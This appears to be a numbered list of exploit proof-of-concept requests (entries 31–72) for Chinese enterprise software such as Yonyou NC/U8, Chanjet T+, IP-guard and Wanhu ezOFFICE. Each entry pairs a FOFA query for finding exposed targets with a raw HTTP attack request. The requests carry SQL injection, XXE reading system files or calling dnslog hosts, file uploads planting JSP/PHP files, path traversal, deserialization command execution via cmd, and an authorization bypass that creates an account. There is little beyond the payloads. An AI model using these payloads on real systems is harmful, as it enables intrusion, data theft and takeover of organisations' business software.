31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: access the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, the dir parameter sets the path it is written to, and the fileType parameter sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

